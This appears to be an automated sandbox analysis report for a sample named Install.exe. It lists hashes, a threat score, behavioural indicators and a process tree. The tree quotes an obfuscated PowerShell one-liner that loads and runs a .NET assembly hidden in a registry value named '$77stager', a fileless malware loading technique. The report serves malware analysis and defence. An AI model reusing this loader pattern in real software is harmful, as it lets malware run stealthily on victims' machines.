1731919d2dc81ad27833aaaf162c923c8c0e9ec12f0517c7db0409b74e9550c6

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
01/07/2024, 18:28

Target

zvgfd-main/Install.exe
Size

164KB
MD5

319a41dd1934848abc8a5df381540481
SHA1

24ad88753d62ae5e38c3b6caba45bef5c70f7699
SHA256

abde8270375bf984b9a8bf1c15ff77f9e33ad185c7305471e05feb80843ee5bc
SHA512

929ca873880db0706ab3d76d98acd343dafab2145fafa3aa05c273b3cf451aac16d1ce71776a9e1fde7a794f172d60dc1536876193bd510de8a259c3f43211cf
SSDEEP

3072:xQpsM8ulc/LGjoOYDqFPgdt3oJ4xbnaldp9pq1N1dIfnXSxmPRnSee9:xQpsMjlc/LGMAFet30Kbml41N1dINP4p

Score

5^/10

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2012d8efe4cbda01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2340	powershell.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2340	powershell.EXE

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2068 wrote to memory of 2340	2068	taskeng.exe	29
PID 2068 wrote to memory of 2340	2068	taskeng.exe	29
PID 2068 wrote to memory of 2340	2068	taskeng.exe	29

C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Install.exe
"C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Install.exe"
1⤵
PID:2384

C:\Windows\system32\taskeng.exe
taskeng.exe {A427E0E1-FCF8-45D4-8FAD-B741CF7CAF75} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+'W'+'ARE').GetValue(''+[Char](36)+'77'+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2340

memory/2340-0-0x000007FEF57FE000-0x000007FEF57FF000-memory.dmp

Filesize
4KB

Download
memory/2340-1-0x000000001A060000-0x000000001A342000-memory.dmp

Filesize
2.9MB

Download
memory/2340-4-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2340-3-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2340-2-0x00000000009E0000-0x00000000009E8000-memory.dmp

Filesize
32KB

Download
memory/2340-5-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2340-6-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download
memory/2340-7-0x00000000015B0000-0x00000000015DA000-memory.dmp

Filesize
168KB

Download
memory/2340-8-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

Filesize
9.6MB

Download